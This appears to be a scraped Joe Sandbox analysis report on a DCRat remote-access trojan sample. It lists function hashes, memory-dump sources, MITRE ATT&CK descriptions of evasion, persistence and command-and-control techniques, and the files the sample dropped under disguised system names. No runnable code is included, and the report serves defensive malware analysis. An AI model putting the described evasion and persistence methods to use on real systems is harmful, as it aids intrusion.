Instruction ID: bd2aaed8d1d697eec75798fe30d89086a9899f7458f76af43433f42aa08064dc
Opcode Fuzzy Hash: 155b38490c865877a637e471a7c2893699225b4edba22a5d291f29a1402fbb2c
Instruction Fuzzy Hash: FF31AE71D0C24A8FEB11AFA889082FEBBE0FF24754F440577D805E61C6EB78A648CB55

Function 00007FF848F404F8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cf343c3345dcda2df03efea5894671d3d192e972ded8613aff94ebfcda9b74a
Instruction ID: 9f84ad751f91f3adaf7f3756ddc967b3dd88eb728b30d70c00fd14a894cb6d29
Opcode Fuzzy Hash: 1cf343c3345dcda2df03efea5894671d3d192e972ded8613aff94ebfcda9b74a
Instruction Fuzzy Hash: 7821AF3091D68E8FEB56FB7488582B97BE1FF29741F1504BBE409C61D2EB38A444C711

Function 00007FF848F40A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed45f3d4dc7f558614d07342b0d44c6c5b01c33b8fa505685a4150be2b198b65
Instruction ID: 205d4652788dd0388ef3c121f109b25a4ee8cd572bc58425bd4be1d97737fd06
Opcode Fuzzy Hash: ed45f3d4dc7f558614d07342b0d44c6c5b01c33b8fa505685a4150be2b198b65
Instruction Fuzzy Hash: 15115B31D1894E9EE780FB68C8491B97BE0FFA8790F4045B6D818E6192EF78A5448740

Function 00007FF848F42768 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2820acbf461070a28f0d0fe4876b24c720aac23ee2271802e9cfdf2f8ba2fe10
Instruction ID: 000a2e278611d9cad328581789d28a692bbea5c4c8cb83ae3aa375ac7b9bd236
Opcode Fuzzy Hash: 2820acbf461070a28f0d0fe4876b24c720aac23ee2271802e9cfdf2f8ba2fe10
Instruction Fuzzy Hash: 8E11B63081D78E8FEB56AF7488582B93FA0FF25741F1504BBD809C61D2EB78A454C741

Function 00007FF848F405D8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f63de7eac384f67a3a3658e9da2c344ccfdafa688b64e91a8c4cc890830e7d
Instruction ID: f7a6647f2f5afee8e97f3eae5040451a1e22a74d99d88af785498ab33e8ec540
Opcode Fuzzy Hash: 27f63de7eac384f67a3a3658e9da2c344ccfdafa688b64e91a8c4cc890830e7d
Instruction Fuzzy Hash: A211B83094865E8FDB89EF2484696BA7BB1FF29340F1044BFD40AD71D2DB3AA595CB04

Function 00007FF848F40608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc0f4efaf9467fbecbe6cc9576d9c6206f5ba0fb8141badd09705be73f93f02d
Instruction ID: b017ac9ed1f3c7e8cf6d71bc976ddd34b449769519647400fd220fa580867171
Opcode Fuzzy Hash: bc0f4efaf9467fbecbe6cc9576d9c6206f5ba0fb8141badd09705be73f93f02d
Instruction Fuzzy Hash: 95016930918A0E9EEB59EB6484592BDB6A0FF28345F20087FE40ED21D1DF39A590C654

Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041d343e3cf4c6dc79239f83dacd4f4f141b8f35ee6e9ec44e0b9b8fcc09011e
Instruction ID: e69be9ceed630fc4fed0e8752f18d288907c5c5c1f8e0bf29b1ca61e727b8088
Opcode Fuzzy Hash: 041d343e3cf4c6dc79239f83dacd4f4f141b8f35ee6e9ec44e0b9b8fcc09011e
Instruction Fuzzy Hash: 43016930859A0E9EEB48FBA484582BDB7A0FF68745F20087FE80ED21D5DF35A590C604

Function 00007FF848F4283D Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc1e713974da074a8023f677fad15c87e3353c3265da125e22b4714dd812e9d
Instruction ID: 48d7e0eaddb2c71662c55a9dddb4189d43521f25c0da4e95a305decb534a908d
Opcode Fuzzy Hash: 5cc1e713974da074a8023f677fad15c87e3353c3265da125e22b4714dd812e9d
Instruction Fuzzy Hash: 35F0F03080D68E8FEB58AF6088082BD3BA0FF65641F00007BE808C10E2EB389440C200

Function 00007FF848F427D8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c081dbab21689e339ec5a497f4b9b37504e4d730da230498b23d6f0bae63ae11
Instruction ID: d27deec7d00f93a85e9dd791e99f0c08909f30fc3c79faedf109ce03b3c8dc10
Opcode Fuzzy Hash: c081dbab21689e339ec5a497f4b9b37504e4d730da230498b23d6f0bae63ae11
Instruction Fuzzy Hash: CAF0203081D64E8EEB68BF7484082FD3AA0FF24741F11087FE819C10C0DF38A490C280

Function 00007FF848F47114 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54322cd1f5ee285431a6f06731c08771517aec14a5a0612f894af7c2eb42333
Instruction ID: cd9c560c466a709688cf65c2ab2017d61852f09acd2a339d66e9b5525feac4be
Opcode Fuzzy Hash: c54322cd1f5ee285431a6f06731c08771517aec14a5a0612f894af7c2eb42333
Instruction Fuzzy Hash: 40F014B0E1892D8EDBE4EF1888547E8B6B1EB68741F5040EE910DF3691CF305AC09F58

Function 00007FF848F40F8F Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53704d0555dc88a793bd15dd229b9d6cd2f475d94274d78f9c7af12c06f820da
Instruction ID: 183d359c5faa185206cd5cf2b9c97f6c1aec5b440ee9668cb2062af4f7c710e2
Opcode Fuzzy Hash: 53704d0555dc88a793bd15dd229b9d6cd2f475d94274d78f9c7af12c06f820da
Instruction Fuzzy Hash: 77E0EC30D1A41A9EEB90FB14CC91BAEAA71EF54344F5081B5D10DA32C6DF386A848B88

Function 00007FF848F42A43 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2151070053.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff848f40000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc06df05fcb47de2c22886c88f0f2b96c72b277dd2de91fcf59dd9f45d13b4e
Instruction ID: 6f1dea61ace7af70f428304322799d613e7936f86c43f989e70017115420dd7f
Opcode Fuzzy Hash: 1cc06df05fcb47de2c22886c88f0f2b96c72b277dd2de91fcf59dd9f45d13b4e
Instruction Fuzzy Hash: 9EB0120B308C5001C7422DEDF4030E47F00CCC21B3708047BC7C4848014122C04A43D3

Analysis Process: RuntimeBroker.exePID: 2428, Parent PID: 4268COMMON

Executed Functions

Function 00007FF848F344F8 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2195762744.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f31000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4603c978ceee62bafe6ac6ce89e2f56a7c454424150f0a2cf6e7b1b501bbf817
Instruction ID: 503326e8f322530e76a45038da5b99330996f169ae70b20808eb6176c77ae596
Opcode Fuzzy Hash: 4603c978ceee62bafe6ac6ce89e2f56a7c454424150f0a2cf6e7b1b501bbf817
Instruction Fuzzy Hash: D6326131C0E6CA9FEB96AF6488592F97FE0FF26341F0405BBD808C65D2DB28A544C756

Function 00007FF848F33AFA Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2195762744.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f31000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a8a2220582de3e5dc1f4cfde8f0e596e33f190ad54b6ca62ff12bce8416f06
Instruction ID: 1117231dc575c6e2acee041c084243e4d452d521949f7a10596714791ae6b12d
Opcode Fuzzy Hash: 44a8a2220582de3e5dc1f4cfde8f0e596e33f190ad54b6ca62ff12bce8416f06
Instruction Fuzzy Hash: DB81AC71E0D6599EEB55FB6CA8996EABBF0FF45351F0001BBC008D7292DF3869848B14

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Mj6WEKda85.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Media Player\ShellExperienceHost.exe

C:\Program Files (x86)\Windows Media Player\f8c8f1285d826b

C:\Users\Default\Pictures\9e8d7a4ca61bd9

C:\Users\Default\Pictures\RuntimeBroker.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\driverDhcp.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe.log

C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat

C:\Users\user\AppData\Local\Temp\UKzmYeaGeM

C:\Windows\Offline Web Pages\f1490002b2f98f

C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

C:\savesbrokerCrt\V4ZyqY05RylvaMusXQjEq4yt.bat

C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe

C:\savesbrokerCrt\driverDhcp.exe

Windows Analysis Report
Mj6WEKda85.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre